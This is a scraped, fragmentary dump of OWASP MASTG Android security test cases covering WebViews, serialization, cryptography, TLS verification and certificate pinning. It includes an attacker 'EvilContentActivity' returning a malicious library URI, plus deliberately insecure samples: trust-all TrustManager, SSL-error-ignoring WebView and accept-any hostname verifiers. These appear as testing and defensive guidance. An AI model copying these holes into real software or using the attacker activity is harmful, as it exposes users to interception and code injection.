EvilContentActivity.java
public class EvilContentActivity extends Activity{\n @Override\n protected void OnCreate(@Nullable Bundle savedInstanceState){\n super.OnCreate(savedInstanceState);\n setResult(-1, new Intent().setData(Uri.parse(\"content:///data/data/com.attacker/fakelib.so\")));\n finish();\n }\n}\n
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0026/#dynamic-analysis","title":"Dynamic Analysis","text":"A convenient way to dynamically test for implicit intents, especially to identify potentially leaked sensitive data, is to use Frida or frida-trace and hook the startActivityForResult
and onActivityResult
methods and inspect the provided intents and the data they contain.
In order to test for URL loading in WebViews you need to carefully analyze handling page navigation, especially when users might be able to navigate away from a trusted environment. The default and safest behavior on Android is to let the default web browser open any link that the user might click inside the WebView. However, this default logic can be modified by configuring a WebViewClient
which allows navigation requests to be handled by the app itself.
To test if the app is overriding the default page navigation logic by configuring a WebViewClient
you should search for and inspect the following interception callback functions:
shouldOverrideUrlLoading
allows your application to either abort loading WebViews with suspicious content by returning true
or allow the WebView to load the URL by returning false
. Considerations:<script>
tags. Instead, shouldInterceptRequest
should take care of this.shouldInterceptRequest
allows the application to return the data from resource requests. If the return value is null, the WebView will continue to load the resource as usual. Otherwise, the data returned by the shouldInterceptRequest
method is used. Considerations:http(s):
, data:
, file:
, etc.), not only those schemes which send requests over the network.javascript:
or blob:
URLs, or for assets accessed via file:///android_asset/
or file:///android_res/
URLs. In the case of redirects, this is only called for the initial resource URL, not any subsequent redirect URLs.setSafeBrowsingWhitelist
or even ignore the warning via the onSafeBrowsingHit
callback.As you can see there are a lot of points to consider when testing the security of WebViews that have a WebViewClient configured, so be sure to carefully read and understand all of them by checking the WebViewClient
Documentation.
While the default value of EnableSafeBrowsing
is true
, some applications might opt to disable it. To verify that SafeBrowsing is enabled, inspect the AndroidManifest.xml file and make sure that the configuration below is not present:
<manifest>\n <application>\n <meta-data android:name=\"android.webkit.WebView.EnableSafeBrowsing\"\n android:value=\"false\" />\n ...\n </application>\n</manifest>\n
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0027/#dynamic-analysis","title":"Dynamic Analysis","text":"A convenient way to dynamically test deep linking is to use Frida or frida-trace and hook the shouldOverrideUrlLoading
, shouldInterceptRequest
methods while using the app and clicking on links within the WebView. Be sure to also hook other related Uri
methods such as getHost
, getScheme
or getPath
which are typically used to inspect the requests and match known patterns or deny lists.
To test for object persistence being used for storing sensitive information on the device, first identify all instances of object serialization and check if they carry any sensitive data. If yes, check if is properly protected against eavesdropping or unauthorized modification.
There are a few generic remediation steps that you can always take:
For high-risk applications that focus on availability, we recommend that you use Serializable
only when the serialized classes are stable. Second, we recommend not using reflection-based persistence because
See the chapter \"Android Anti-Reversing Defenses\" for more details.
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0034/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0034/#object-serialization","title":"Object Serialization","text":"Search the source code for the following keywords:
import java.io.Serializable
implements Serializable
If you need to counter memory-dumping, make sure that very sensitive information is not stored in the JSON format because you can't guarantee prevention of anti-memory dumping techniques with the standard libraries. You can check for the following keywords in the corresponding libraries:
JSONObject
Search the source code for the following keywords:
import org.json.JSONObject;
import org.json.JSONArray;
GSON
Search the source code for the following keywords:
import com.google.gson
import com.google.gson.annotations
import com.google.gson.reflect
import com.google.gson.stream
new Gson();
@Expose
, @JsonAdapter
, @SerializedName
,@Since
, and @Until
Jackson
Search the source code for the following keywords:
import com.fasterxml.jackson.core
import org.codehaus.jackson
for the older version.When you use an ORM library, make sure that the data is stored in an encrypted database and the class representations are individually encrypted before storing it. See the chapters \"Data Storage on Android\" and \"Android Cryptographic APIs\" for more details. You can check for the following keywords in the corresponding libraries:
OrmLite
Search the source code for the following keywords:
import com.j256.*
import com.j256.dao
import com.j256.db
import com.j256.stmt
import com.j256.table\\
Please make sure that logging is disabled.
SugarORM
Search the source code for the following keywords:
import com.github.satyan
extends SugarRecord<Type>
meta-data
entries with values such as DATABASE
, VERSION
, QUERY_LOG
and DOMAIN_PACKAGE_NAME
.Make sure that QUERY_LOG
is set to false.
GreenDAO
Search the source code for the following keywords:
import org.greenrobot.greendao.annotation.Convert
import org.greenrobot.greendao.annotation.Entity
import org.greenrobot.greendao.annotation.Generated
import org.greenrobot.greendao.annotation.Id
import org.greenrobot.greendao.annotation.Index
import org.greenrobot.greendao.annotation.NotNull
import org.greenrobot.greendao.annotation.*
import org.greenrobot.greendao.database.Database
import org.greenrobot.greendao.query.Query
ActiveAndroid
Search the source code for the following keywords:
ActiveAndroid.initialize(<contextReference>);
import com.activeandroid.Configuration
import com.activeandroid.query.*
Realm
Search the source code for the following keywords:
import io.realm.RealmObject;
import io.realm.annotations.PrimaryKey;
Make sure that appropriate security measures are taken when sensitive information is stored in an Intent via a Bundle that contains a Parcelable. Use explicit Intents and verify proper additional security controls when using application-level IPC (e.g., signature verification, intent-permissions, crypto).
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0034/#dynamic-analysis","title":"Dynamic Analysis","text":"There are several ways to perform dynamic analysis:
To test for enforced updating you need to check if the app has support for in-app updates and validate if it's properly enforced so that the user is not able to continue using the app without updating it first.
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0036/#static-analysis","title":"Static analysis","text":"The code sample below shows the example of an app-update:
//Part 1: check for update\n// Creates instance of the manager.\nAppUpdateManager appUpdateManager = AppUpdateManagerFactory.create(context);\n\n// Returns an intent object that you use to check for an update.\nTask<AppUpdateInfo> appUpdateInfo = appUpdateManager.getAppUpdateInfo();\n\n// Checks that the platform will allow the specified type of update.\nif (appUpdateInfo.updateAvailability() == UpdateAvailability.UPDATE_AVAILABLE\n // For a flexible update, use AppUpdateType.FLEXIBLE\n && appUpdateInfo.isUpdateTypeAllowed(AppUpdateType.IMMEDIATE)) {\n\n\n\n //...Part 2: request update\n appUpdateManager.startUpdateFlowForResult(\n // Pass the intent that is returned by 'getAppUpdateInfo()'.\n appUpdateInfo,\n // Or 'AppUpdateType.FLEXIBLE' for flexible updates.\n AppUpdateType.IMMEDIATE,\n // The current activity making the update request.\n this,\n // Include a request code to later monitor this update request.\n MY_REQUEST_CODE);\n\n\n\n //...Part 3: check if update completed successfully\n @Override\n public void onActivityResult(int requestCode, int resultCode, Intent data) {\n if (myRequestCode == MY_REQUEST_CODE) {\n if (resultCode != RESULT_OK) {\n log(\"Update flow failed! Result code: \" + resultCode);\n // If the update is cancelled or fails,\n // you can request to start the update again in case of forced updates\n }\n }\n }\n\n //..Part 4:\n // Checks that the update is not stalled during 'onResume()'.\n// However, you should execute this check at all entry points into the app.\n@Override\nprotected void onResume() {\n super.onResume();\n\n appUpdateManager\n .getAppUpdateInfo()\n .addOnSuccessListener(\n appUpdateInfo -> {\n ...\n if (appUpdateInfo.updateAvailability()\n == UpdateAvailability.DEVELOPER_TRIGGERED_UPDATE_IN_PROGRESS) {\n // If an in-app update is already running, resume the update.\n manager.startUpdateFlowForResult(\n appUpdateInfo,\n IMMEDIATE,\n this,\n MY_REQUEST_CODE);\n }\n });\n}\n}\n
Source: https://developer.android.com/guide/app-bundle/in-app-updates
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0036/#dynamic-analysis","title":"Dynamic analysis","text":"In order to test for proper updating: try downloading an older version of the application with a security vulnerability, either by a release from the developers or by using a third party app-store. Next, verify whether or not you can continue to use the application without updating it. If an update prompt is given, verify if you can still use the application by canceling the prompt or otherwise circumventing it through normal application usage. This includes validating whether the backend will stop calls to vulnerable backends and/or whether the vulnerable app-version itself is blocked by the backend. Lastly, see if you can play with the version number of a man-in-the-middled app and see how the backend responds to this (and if it is recorded at all for instance).
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0042/","title":"Checking for Weaknesses in Third Party Libraries","text":""},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0042/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0042/#static-analysis","title":"Static Analysis","text":"Detecting vulnerabilities in third party dependencies can be done by means of the OWASP Dependency checker. This is best done by using a gradle plugin, such as dependency-check-gradle
. In order to use the plugin, the following steps need to be applied: Install the plugin from the Maven central repository by adding the following script to your build.gradle:
buildscript {\n repositories {\n mavenCentral()\n }\n dependencies {\n classpath 'org.owasp:dependency-check-gradle:3.2.0'\n }\n}\n\napply plugin: 'org.owasp.dependencycheck'\n
Once gradle has invoked the plugin, you can create a report by running:
gradle assemble\ngradle dependencyCheckAnalyze --info\n
The report will be in build/reports
unless otherwise configured. Use the report in order to analyze the vulnerabilities found. See remediation on what to do given the vulnerabilities found with the libraries.
Please be advised that the plugin requires to download a vulnerability feed. Consult the documentation in case issues arise with the plugin.
Lastly, please note that for hybrid applications, one will have to check the JavaScript dependencies with RetireJS. Similarly for Xamarin, one will have to check the C# dependencies.
When a library is found to contain vulnerabilities, then the following reasoning applies:
When the sources are not available, one can decompile the app and check the JAR files. When Dexguard or ProGuard are applied properly, then version information about the library is often obfuscated and therefore gone. Otherwise you can still find the information very often in the comments of the Java files of given libraries. Tools such as MobSF can help in analyzing the possible libraries packed with the application. If you can retrieve the version of the library, either via comments, or via specific methods used in certain versions, you can look them up for CVEs by hand.
If the application is a high-risk application, you will end up vetting the library manually. In that case, there are specific requirements for native code, which you can find in the chapter \"Testing Code Quality\". Next to that, it is good to vet whether all best practices for software engineering are applied.
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0042/#dynamic-analysis","title":"Dynamic Analysis","text":"The dynamic analysis of this section comprises validating whether the copyrights of the licenses have been adhered to. This often means that the application should have an about
or EULA
section in which the copyright statements are noted as required by the license of the third party library.
There are various items to look for:
Note that there can be memory leaks in Java/Kotlin code as well. Look for various items, such as: BroadcastReceivers which are not unregistered, static references to Activity
or View
classes, Singleton classes that have references to Context
, Inner Class references, Anonymous Class references, AsyncTask references, Handler references, Threading done wrong, TimerTask references. For more details, please check:
There are various steps to take:
Test the app native libraries to determine if they have the PIE and stack smashing protections enabled.
You can use radare2's rabin2 to get the binary information. We'll use the UnCrackable App for Android Level 4 v1.0 APK as an example.
All native libraries must have canary
and pic
both set to true
.
That's the case for libnative-lib.so
:
rabin2 -I lib/x86_64/libnative-lib.so | grep -E \"canary|pic\"\ncanary true\npic true\n
But not for libtool-checker.so
:
rabin2 -I lib/x86_64/libtool-checker.so | grep -E \"canary|pic\"\ncanary false\npic true\n
In this example, libtool-checker.so
must be recompiled with stack smashing protection support.
Identify all the instances of symmetric key encryption in code and look for any mechanism which loads or provides a symmetric key. You can look for:
DES
, AES
, etc.)KeyGenParameterSpec
, KeyPairGeneratorSpec
, KeyPairGenerator
, KeyGenerator
, KeyProperties
, etc.)java.security.*
, javax.crypto.*
, android.security.*
, android.security.keystore.*
Check also the list of common cryptographic configuration issues.
For each identified instance verify if the used symmetric keys:
For each hardcoded symmetric key, verify that is not used in security-sensitive contexts as the only method of encryption.
As an example we illustrate how to locate the use of a hardcoded encryption key. First disassemble and decompile the app to obtain Java code, e.g. by using jadx.
Now search the files for the usage of the SecretKeySpec
class, e.g. by simply recursively grepping on them or using jadx search function:
grep -r \"SecretKeySpec\"\n
This will return all classes using the SecretKeySpec
class. Now examine those files and trace which variables are used to pass the key material. The figure below shows the result of performing this assessment on a production ready application. We can clearly locate the use of a static encryption key that is hardcoded and initialized in the static byte array Encrypt.keyBytes
.
You can use method tracing on cryptographic methods to determine input / output values such as the keys that are being used. Monitor file system access while cryptographic operations are being performed to assess where key material is written to or read from. For example, monitor the file system by using the API monitor of RMS - Runtime Mobile Security.
"},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0014/","title":"Testing the Configuration of Cryptographic Standard Algorithms","text":""},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0014/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0014/#static-analysis","title":"Static Analysis","text":"Identify all the instances of the cryptographic primitives in code. Identify all custom cryptography implementations. You can look for:
Cipher
, Mac
, MessageDigest
, Signature
Key
, PrivateKey
, PublicKey
, SecretKey
getInstance
, generateKey
KeyStoreException
, CertificateException
, NoSuchAlgorithmException
java.security.*
, javax.crypto.*
, android.security.*
and android.security.keystore.*
packages. Identify that all calls to getInstance use the default provider
of security services by not specifying it (it means AndroidOpenSSL aka Conscrypt). Provider
can only be specified in KeyStore
related code (in that situation KeyStore
should be provided as provider
). If other provider
is specified it should be verified according to situation and business case (i.e. Android API version), and provider
should be examined against potential vulnerabilities.
Ensure that the best practices outlined in the \"Cryptography for Mobile Apps\" chapter are followed. Look at insecure and deprecated algorithms and common configuration issues.
"},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0014/#dynamic-analysis","title":"Dynamic Analysis","text":"You can use method tracing on cryptographic methods to determine input / output values such as the keys that are being used. Monitor file system access while cryptographic operations are being performed to assess where key material is written to or read from. For example, monitor the file system by using the API monitor of RMS - Runtime Mobile Security.
"},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0015/","title":"Testing the Purposes of Keys","text":""},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0015/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0015/#static-analysis","title":"Static Analysis","text":"Identify all instances where cryptography is used. You can look for:
Cipher
, Mac
, MessageDigest
, Signature
Key
, PrivateKey
, PublicKey
, SecretKey
getInstance
, generateKey
KeyStoreException
, CertificateException
, NoSuchAlgorithmException
java.security.*
, javax.crypto.*
, android.security.*
, android.security.keystore.*
For each identified instance, identify its purpose and its type. It can be used:
Additionally, you should identify the business logic which uses identified instances of cryptography.
During verification the following checks should be performed:
You can use method tracing on cryptographic methods to determine input / output values such as the keys that are being used. Monitor file system access while cryptographic operations are being performed to assess where key material is written to or read from. For example, monitor the file system by using the API monitor of RMS - Runtime Mobile Security.
"},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0016/","title":"Testing Random Number Generation","text":""},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0016/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0016/#static-analysis","title":"Static Analysis","text":"Identify all the instances of random number generators and look for either custom or well-known insecure classes. For instance, java.util.Random
produces an identical sequence of numbers for each given seed value; consequently, the sequence of numbers is predictable. Instead, a well-vetted algorithm should be chosen that is currently considered to be strong by experts in the field, and well-tested implementations with adequate length seeds should be used.
Identify all instances of SecureRandom
that are not created using the default constructor. Specifying the seed value may reduce randomness. Prefer the no-argument constructor of SecureRandom
that uses the system-specified seed value to generate a 128-byte-long random number.
In general, if a PRNG is not advertised as being cryptographically secure (e.g. java.util.Random
), then it is probably a statistical PRNG and should not be used in security-sensitive contexts. Pseudo-random number generators can produce predictable numbers if the generator is known and the seed can be guessed. A 128-bit seed is a good starting point for producing a \"random enough\" number.
Once an attacker knows what type of weak pseudo-random number generator (PRNG) is used, it can be trivial to write a proof-of-concept to generate the next random value based on previously observed ones, as it was done for Java Random. In case of very weak custom random generators it may be possible to observe the pattern statistically. Although the recommended approach would anyway be to decompile the APK and inspect the algorithm (see Static Analysis).
If you want to test for randomness, you can try to capture a large set of numbers and check with the Burp's sequencer to see how good the quality of the randomness is.
"},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0016/#dynamic-analysis","title":"Dynamic Analysis","text":"You can use method tracing on the mentioned classes and methods to determine input / output values being used.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0019/","title":"Testing Data Encryption on the Network","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0019/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0019/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0019/#testing-network-requests-over-secure-protocols","title":"Testing Network Requests over Secure Protocols","text":"First, you should identify all network requests in the source code and ensure that no plain HTTP URLs are used. Make sure that sensitive information is sent over secure channels by using HttpsURLConnection
or SSLSocket
(for socket-level communication using TLS).
Next, even when using a low-level API which is supposed to make secure connections (such as SSLSocket
), be aware that it has to be securely implemented. For instance, SSLSocket
doesn't verify the hostname. Use getDefaultHostnameVerifier
to verify the hostname. The Android developer documentation includes a code example.
Next, you should ensure that the app is not allowing cleartext HTTP traffic. Since Android 9 (API level 28) cleartext HTTP traffic is blocked by default (thanks to the default Network Security Configuration) but there are multiple ways in which an application can still send it:
android:usesCleartextTraffic
attribute of the <application>
tag in the AndroidManifest.xml file. Note that this flag is ignored in case the Network Security Configuration is configured.cleartextTrafficPermitted
attribute to true on <domain-config>
elements.Socket
) to set up a custom HTTP connection.All of the above cases must be carefully analyzed as a whole. For example, even if the app does not permit cleartext traffic in its Android Manifest or Network Security Configuration, it might actually still be sending HTTP traffic. That could be the case if it's using a low-level API (for which Network Security Configuration is ignored) or a badly configured cross-platform framework.
For more information refer to the article \"Security with HTTPS and SSL\".
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0019/#dynamic-analysis","title":"Dynamic Analysis","text":"Intercept the tested app's incoming and outgoing network traffic and make sure that this traffic is encrypted. You can intercept network traffic in any of the following ways:
Some applications may not work with proxies like Burp and OWASP ZAP because of Certificate Pinning. In such a scenario, please check \"Testing Custom Certificate Stores and Certificate Pinning\".
For more details refer to:
Refer to section \"Verifying the TLS Settings\" in chapter \"Mobile App Network Communication\" for details.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0021/","title":"Testing Endpoint Identity Verification","text":"Using TLS to transport sensitive information over the network is essential for security. However, encrypting communication between a mobile application and its backend API is not trivial. Developers often decide on simpler but less secure solutions (e.g., those that accept any certificate) to facilitate the development process, and sometimes these weak solutions make it into the production version, potentially exposing users to man-in-the-middle attacks.
Two key issues should be addressed:
Make sure that the hostname and the certificate itself are verified correctly. Examples and common pitfalls are available in the official Android documentation. Search the code for examples of TrustManager
and HostnameVerifier
usage. In the sections below, you can find examples of the kind of insecure usage that you should look for.
Note that from Android 8.0 (API level 26) onward, there is no support for SSLv3 and HttpsURLConnection
will no longer perform a fallback to an insecure TLS/SSL protocol.
Applications targeting Android 7.0 (API level 24) or higher will use a default Network Security Configuration that doesn't trust any user supplied CAs, reducing the possibility of MITM attacks by luring users to install malicious CAs.
Decode the app using apktool and verify that the targetSdkVersion
in apktool.yml is equal to or higher than 24
.
grep targetSdkVersion UnCrackable-Level3/apktool.yml\n targetSdkVersion: '28'\n
However, even if targetSdkVersion >=24
, the developer can disable default protections by using a custom Network Security Configuration defining a custom trust anchor forcing the app to trust user supplied CAs. See \"Analyzing Custom Trust Anchors\".
Search for the Network Security Configuration file and inspect any custom <trust-anchors>
defining <certificates src=\"user\">
(which should be avoided).
You should carefully analyze the precedence of entries:
<domain-config>
entry or in a parent <domain-config>
, the configurations in place will be based on the <base-config>
Take a look at this example of a Network Security Configuration for an app targeting Android 9 (API level 28):
<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<network-security-config>\n <domain-config>\n <domain includeSubdomains=\"false\">owasp.org</domain>\n <trust-anchors>\n <certificates src=\"system\" />\n <certificates src=\"user\" />\n </trust-anchors>\n </domain-config>\n</network-security-config>\n
Some observations:
<base-config>
, meaning that the default configuration for Android 9 (API level 28) or higher will be used for all other connections (only system
CA will be trusted in principle).<domain-config>
overrides the default configuration allowing the app to trust both system
and user
CAs for the indicated <domain>
(owasp.org).includeSubdomains=\"false\"
.Putting all together we can translate the above Network Security Configuration to: \"the app trusts system and user CAs for the owasp.org domain, excluding its subdomains. For any other domains the app will trust the system CAs only\".
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0021/#verifying-the-server-certificate","title":"Verifying the Server Certificate","text":"TrustManager
is a means of verifying conditions necessary for establishing a trusted connection in Android. The following conditions should be checked at this point:
The following code snippet is sometimes used during development and will accept any certificate, overwriting the functions checkClientTrusted
, checkServerTrusted
, and getAcceptedIssuers
. Such implementations should be avoided, and, if they are necessary, they should be clearly separated from production builds to avoid built-in security flaws.
TrustManager[] trustAllCerts = new TrustManager[] {\n new X509TrustManager() {\n @Override\n public X509Certificate[] getAcceptedIssuers() {\n return new java.security.cert.X509Certificate[] {};\n }\n\n @Override\n public void checkClientTrusted(X509Certificate[] chain, String authType)\n throws CertificateException {\n }\n\n @Override\n public void checkServerTrusted(X509Certificate[] chain, String authType)\n throws CertificateException {\n }\n }\n };\n\n// SSLContext context\ncontext.init(null, trustAllCerts, new SecureRandom());\n
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0021/#webview-server-certificate-verification","title":"WebView Server Certificate Verification","text":"Sometimes applications use a WebView to render the website associated with the application. This is true of HTML/JavaScript-based frameworks such as Apache Cordova, which uses an internal WebView for application interaction. When a WebView is used, the mobile browser performs the server certificate validation. Ignoring any TLS error that occurs when the WebView tries to connect to the remote website is a bad practice.
The following code will ignore TLS issues, exactly like the WebViewClient custom implementation provided to the WebView:
WebView myWebView = (WebView) findViewById(R.id.webview);\nmyWebView.setWebViewClient(new WebViewClient(){\n @Override\n public void onReceivedSslError(WebView view, SslErrorHandler handler, SslError error) {\n //Ignore TLS certificate errors and instruct the WebViewClient to load the website\n handler.proceed();\n }\n});\n
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0021/#apache-cordova-certificate-verification","title":"Apache Cordova Certificate Verification","text":"Implementation of the Apache Cordova framework's internal WebView usage will ignore TLS errors in the method onReceivedSslError
if the flag android:debuggable
is enabled in the application manifest. Therefore, make sure that the app is not debuggable. See the test case \"Testing If the App is Debuggable\".
Another security flaw in client-side TLS implementations is the lack of hostname verification. Development environments usually use internal addresses instead of valid domain names, so developers often disable hostname verification (or force an application to allow any hostname) and simply forget to change it when their application goes to production. The following code disables hostname verification:
final static HostnameVerifier NO_VERIFY = new HostnameVerifier() {\n public boolean verify(String hostname, SSLSession session) {\n return true;\n }\n};\n
With a built-in HostnameVerifier
, accepting any hostname is possible:
HostnameVerifier NO_VERIFY = org.apache.http.conn.ssl.SSLSocketFactory\n .ALLOW_ALL_HOSTNAME_VERIFIER;\n
Make sure that your application verifies a hostname before setting a trusted connection.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0021/#dynamic-analysis","title":"Dynamic Analysis","text":"When testing an app targeting Android 7.0 (API level 24) or higher it should be effectively applying the Network Security Configuration and you shouldn't be able to see the decrypted HTTPS traffic at first. However, if the app targets API levels below 24, the app will automatically accept the installed user certificates.
To test improper certificate verification launch a MITM attack using an interception proxy such as Burp. Try the following options:
If you're still not able to see any decrypted HTTPS traffic, your application might be implementing certificate pinning.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/","title":"Testing Custom Certificate Stores and Certificate Pinning","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/#network-security-configuration","title":"Network Security Configuration","text":"Inspect the Network Security Configuration looking for any <pin-set>
elements. Check their expiration
date, if any. If expired, certificate pinning will be disabled for the affected domains.
Testing Tip: If a certificate pinning validation check has failed, the following event should be logged in the system logs:
I/X509Util: Failed to validate the certificate chain, error: Pin verification failed\n
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/#trustmanager","title":"TrustManager","text":"Implementing certificate pinning involves three main steps:
To analyze the correct implementation of certificate pinning, the HTTP client should load the KeyStore:
InputStream in = resources.openRawResource(certificateRawResource);\nkeyStore = KeyStore.getInstance(\"BKS\");\nkeyStore.load(resourceStream, password);\n
Once the KeyStore has been loaded, we can use the TrustManager that trusts the CAs in our KeyStore:
String tmfAlgorithm = TrustManagerFactory.getDefaultAlgorithm();\nTrustManagerFactory tmf = TrustManagerFactory.getInstance(tmfAlgorithm);\ntmf.init(keyStore);\n// Create an SSLContext that uses the TrustManager\n// SSLContext context = SSLContext.getInstance(\"TLS\");\nsslContext.init(null, tmf.getTrustManagers(), null);\n
The app's implementation may be different, pinning against the certificate's public key only, the whole certificate, or a whole certificate chain.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/#network-libraries-and-webviews","title":"Network Libraries and WebViews","text":"Applications that use third-party networking libraries may utilize the libraries' certificate pinning functionality. For example, okhttp can be set up with the CertificatePinner
as follows:
OkHttpClient client = new OkHttpClient.Builder()\n .certificatePinner(new CertificatePinner.Builder()\n .add(\"example.com\", \"sha256/UwQAapahrjCOjYI3oLUx5AQxPBR02Jz6/E2pt0IeLXA=\")\n .build())\n .build();\n
Applications that use a WebView component may utilize the WebViewClient's event handler for some kind of \"certificate pinning\" of each request before the target resource is loaded. The following code shows an example verification:
WebView myWebView = (WebView) findViewById(R.id.webview);\nmyWebView.setWebViewClient(new WebViewClient(){\n private String expectedIssuerDN = \"CN=Let's Encrypt Authority X3,O=Let's Encrypt,C=US;\";\n\n @Override\n public void onLoadResource(WebView view, String url) {\n //From Android API documentation about \"WebView.getCertificate()\":\n //Gets the SSL certificate for the main top-level page\n //or null if there is no certificate (the site is not secure).\n //\n //Available information on SslCertificate class are \"Issuer DN\", \"Subject DN\" and validity date helpers\n SslCertificate serverCert = view.getCertificate();\n if(serverCert != null){\n //apply either certificate or public key pinning comparison here\n //Throw exception to cancel resource loading...\n }\n }\n }\n});\n
Alternatively, it is better to use an OkHttpClient with configured pins and let it act as a proxy overriding shouldInterceptRequest
of the WebViewClient
.
Applications developed in Xamarin will typically use ServicePointManager
to implement pinning.
Normally a function is created to check the certificate(s) and return the boolean value to the method ServerCertificateValidationCallback
:
[Activity(Label = \"XamarinPinning\", MainLauncher = true)]\n public class MainActivity : Activity\n {\n // SupportedPublicKey - Hexadecimal value of the public key.\n // Use GetPublicKeyString() method to determine the public key of the certificate we want to pin. Uncomment the debug code in the ValidateServerCertificate function a first time to determine the value to pin.\n private const string SupportedPublicKey = \"3082010A02820101009CD30CF05AE52E47B7725D3783B...\"; // Shortened for readability\n\n private static bool ValidateServerCertificate(\n object sender,\n X509Certificate certificate,\n X509Chain chain,\n SslPolicyErrors sslPolicyErrors\n )\n {\n //Log.Debug(\"Xamarin Pinning\",chain.ChainElements[X].Certificate.GetPublicKeyString());\n //return true;\n return SupportedPublicKey == chain.ChainElements[1].Certificate.GetPublicKeyString();\n }\n\n protected override void OnCreate(Bundle savedInstanceState)\n {\n System.Net.ServicePointManager.ServerCertificateValidationCallback += ValidateServerCertificate;\n base.OnCreate(savedInstanceState);\n SetContentView(Resource.Layout.Main);\n TesteAsync(\"https://security.claudio.pt\");\n\n }\n
In this particular example we are pinning the intermediate CA of the certificate chain. The output of the HTTP response will be available in the system logs.
Sample Xamarin app with the previous example can be obtained on the MASTG repository
After decompressing the APK file, use a .NET decompiler like dotPeek, ILSpy or dnSpy to decompile the app dlls stored inside the 'Assemblies' folder and confirm the usage of the ServicePointManager.
Learn more:
Hybrid applications based on Cordova do not support Certificate Pinning natively, so plugins are used to achieve this. The most common one is PhoneGap SSL Certificate Checker. The check
method is used to confirm the fingerprint and callbacks will determine the next steps.
// Endpoint to verify against certificate pinning.\n var server = \"https://www.owasp.org\";\n // SHA256 Fingerprint (Can be obtained via \"openssl s_client -connect hostname:443 | openssl x509 -noout -fingerprint -sha256\"\n var fingerprint = \"D8 EF 3C DF 7E F6 44 BA 04 EC D5 97 14 BB 00 4A 7A F5 26 63 53 87 4E 76 67 77 F0 F4 CC ED 67 B9\";\n\n window.plugins.sslCertificateChecker.check(\n successCallback,\n errorCallback,\n server,\n fingerprint);\n\n function successCallback(message) {\n alert(message);\n // Message is always: CONNECTION_SECURE.\n // Now do something with the trusted server.\n }\n\n function errorCallback(message) {\n alert(message);\n if (message === \"CONNECTION_NOT_SECURE\") {\n // There is likely a man in the middle attack going on, be careful!\n } else if (message.indexOf(\"CONNECTION_FAILED\") > -1) {\n // There was no connection (yet). Internet may be down. Try again (a few times) after a little timeout.\n }\n }\n
After decompressing the APK file, Cordova/Phonegap files will be located in the /assets/www folder. The 'plugins' folder will give you the visibility of the plugins used. We will need to search for this methods in the JavaScript code of the application to confirm its usage.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/#dynamic-analysis","title":"Dynamic Analysis","text":"Follow the instructions from \"Testing Endpoint Identity Verification > Dynamic Analysis\". If doing so doesn't lead to traffic being proxied, it may mean that certificate pinning is actually implemented and all security measures are in place. Does the same happen for all domains?
As a quick smoke test, you can try to bypass certificate pinning using objection as described in \"Bypassing Certificate Pinning\". Pinning related APIs being hooked by objection should appear in objection's output.
However, keep in mind that:
In both cases, the app or some of its components might implement custom pinning in a way that is not supported by objection. Please check the static analysis section for specific pinning indicators and more in-depth testing.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0023/","title":"Testing the Security Provider","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0023/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0023/#static-analysis","title":"Static Analysis","text":"Applications based on the Android SDK should depend on GooglePlayServices. For example, in the gradle build file, you will find compile 'com.google.android.gms:play-services-gcm:x.x.x'
in the dependencies block. You need to make sure that the ProviderInstaller
class is called with either installIfNeeded
or installIfNeededAsync
. ProviderInstaller
